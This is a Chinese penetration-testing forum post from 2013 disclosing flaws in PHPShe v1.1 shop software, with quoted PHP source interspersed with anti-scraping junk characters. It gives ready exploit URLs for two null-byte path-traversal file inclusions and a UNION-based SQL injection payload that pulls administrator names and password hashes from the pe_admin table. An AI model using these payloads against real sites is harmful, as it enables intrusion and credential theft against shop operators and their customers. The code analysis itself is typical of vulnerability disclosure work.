找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
返回列表 发新帖
查看: 2676|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/
( j. k" \6 H9 j0 `7 |/* Phpshe v1.1 Vulnerability8 G- q* G# z/ I  a2 I2 u4 a+ M2 Y
/* ========================; r; x3 p5 B) [/ o# m- M$ y$ K! M  M+ j
/* By: : Kn1f3
- U( {( y6 l+ E/* E-Mail : 681796@qq.com4 V7 O- |1 s9 g' B" ]0 k
/*******************************************************/
8 a7 A' N3 H# b0×00 整体大概参数传输
& X9 V# i3 f% y9 [, ^' o
& i. T- O& n; G; ?+ ?* C7 M# d* D, D- ?+ T1 L& C$ v2 G
- g0 ^, y# i! ]
//common.php1 z( Z) X; H2 H( e- b: i
if (get_magic_quotes_gpc()) {2 B9 T8 h: `/ P8 l! q( N
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
: w% F2 w/ G: t' [. H) T. o!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');0 d" }  e) d4 F4 H( \" \7 M  P
}% v( V# P( Z3 z( m
else {
# ~  {# Y4 R# Y! u2 B!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');# {$ x# r( F/ N; j: h! a
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
& E3 Y* Z* w3 z* t, r}% x9 s9 A, \4 W% H# O
session_start();
: J2 T1 W! M* k% I. @6 X0 @!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');1 w4 V# e" v$ T( V$ F
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
2 d! x" c$ j* s  ^2 ^; A
& ~; F; g0 {+ R; O4 V3 g7 J4 p0×01 包含漏洞( E' k; w- e1 B1 X- G7 X% v0 b4 h

- o, E+ x! L; H, X+ a4 o3 x# v( P0 b; S- `
//首页文件4 n: O( M. E! M1 Y# q2 v
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);0 M% n( A) q6 R5 h
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
- O2 L- O, g# S5 {8 z$ }- g2 gpe_result();
' l/ A# A4 ?0 k+ R2 u" Y- Q+ W?>% i: H% O6 p( e2 J# C3 ^% s& c
//common 文件 第15行开始
1 v5 n( e" v1 c1 H9 B9 [url路由配置
- e. ?6 j, \6 q( _. E( N; l$module = $mod = $act = 'index';  s: [1 }% t- H  d  y
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);' o( P% |2 K2 l! |
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
- I6 M5 O) F/ X. v. `$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);/ O) J& ^6 E$ P& {# J
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
+ C% p3 N6 \0 Q; e

  i9 X0 Q) X! ^$ L
* Z2 c$ J8 p4 v* u/ R; q0 C7 B0 y
0×02 搜索注入
9 E1 G. U9 q/ p  I" E, c5 C
% _2 k+ A( y& [% e% C<code id="code2">

//product.php文件
) h. Z& x- x8 c) @case 'list':
; U/ [. Q: J3 K) W( y) Z  ?! ~$category_id = intval($id);
6 e% W  v2 i7 {% a& i$info = $db->pe_select('category', array('category_id'=>$category_id));
" P7 W) F( {' z" Y//搜索
$ j& L/ z  I. @  [, u- ^8 {$sqlwhere = " and `product_state` = 1";
" j4 _1 z( [4 l" V7 g4 cpe_lead('hook/category.hook.php');
; n3 P0 x9 P3 G  C4 b# x) \if ($category_id) {
. c% H' Q" ]. M4 vwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";. O9 u; V$ i6 @, q
}
# t, T( Q7 J7 ~: ~$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
7 [, ^( C0 K) p$ m/ ?  |' Y# fif ($_g_orderby) {; T' I' j. D6 b& p* `/ Y
$orderby = explode('_', $_g_orderby);' B  ^4 L0 s( o- M3 c# ]
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";" u3 K& ^, N7 o& Y# r
}, l" v0 }4 L2 l' R# Y; ?
else {8 j; _8 V8 f7 R0 a3 o
$sqlwhere .= " order by `product_id` desc";$ N" ~5 K2 P" o; {- H, P& _$ Q- Q
}
3 K) z$ Q+ \2 F. g2 [$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));7 n& E: I0 l& j. y% n3 S4 R6 Z8 B
//热卖排行
" `* R2 L/ R3 U2 Q) @. e) l$product_hotlist = product_hotlist();
1 ^7 \9 @7 S2 H. p) t! u: ]5 h1 @//当前路径
& [4 k0 ~& ^' }: |; t. S$nowpath = category_path($category_id);" \+ t$ U4 v" s9 {  J) c( Z
$seo = pe_seo($info['category_name']);
( f: d) G5 \6 F5 \, jinclude(pe_tpl('product_list.html'));
1 `0 ~# E, Y- T0 w//跟进selectall函数库
4 w, A- g  S& f8 hpublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())5 A: F! P. z- S% x) f/ B# b5 s' w; c4 [
{7 n4 @) J# r6 t
//处理条件语句
( T$ T/ D' G: Z8 n0 k( o$sqlwhere = $this->_dowhere($where);
3 T  G+ p$ B) V* ?% ]& J: qreturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
4 Z6 D* }* `  i4 [& X6 ]1 w( |}0 c* z) f; ~( R% p
//exp
. C  Q9 d9 i' f1 Y4 \/ Z2 b7 _product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
# r0 \: a  g' j

</code>0 t" [( F0 Y) k7 n1 H! s3 {

: s: W2 M2 m# A0×03 包含漏洞2! ~8 ?& ~4 Y1 x! E0 B$ m
8 L4 V* P8 Q& B: A0 b6 X
<code id="code3">

//order.php

case 'pay':


7 J0 |- i1 b4 u; s$order_id = pe_dbhold($_g_id);


# }2 c7 G  U3 \( E$cache_payway = cache::get('payway');


" x" C2 b# [! }  @! k, _& Pforeach($cache_payway as $k => $v) {


+ w7 Q1 [2 U8 M  I$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

7 y' c' {0 f9 u& W. Y' p3 Y6 Z
if ($k == 'bank') {

8 J, R% E7 w3 S/ D" g6 M
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


: w* D0 ~* o9 w! W# ^- S}

7 Z6 ?6 T6 h5 H( P9 f
}


& o9 b: {, b5 ^2 Z' J; L% t  ]; r$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

7 w# K' E, L5 e% N& p: g, _9 B
!$order['order_id'] && pe_error('订单号错误...');

/ l! y- N5 W; C% i, z" [
if (isset($_p_pesubmit)) {

/ G2 q* A2 l8 J$ J2 v3 Y) ]
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

9 i1 h# k7 e5 J) V
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


  I* F8 j, F0 z5 W. eforeach ($info_list as $v) {


3 B% h( a1 @$ v$ u$order['order_name'] .= "{$v['product_name']};";
, N7 F! S  h9 m! P1 J+ b7 T; ~

3 X2 O; f, ?9 O1 s# a. N2 T
}


) V  k" G& Z. c" y  d4 d3 r9 Decho '正在为您连接支付网站,请稍后...';


. N8 w& g: T. Hinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

- ~# W3 T0 u# h, X
}//当一切准备好的时候就可以进行"鸡肋包含了"


& C) q& _; ]& N' U! W/ n6 G; B, relse {

9 l  P$ b  Y0 L1 m  ], U
pe_error('支付错误...');

' W, K. y5 ^& r1 W% n4 y
}


1 M2 b" w% z8 u* r* R4 ]! t}

. T8 j2 v; x; }7 i. H; U$ B" v# X, Z
$seo = pe_seo('选择支付方式');


* r3 D' G' U) Yinclude(pe_tpl('order_pay.html'));


3 P) W; m# H* Z  }: w2 L6 y$ dbreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>4 J% B* s! X6 X9 z# q0 u
http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表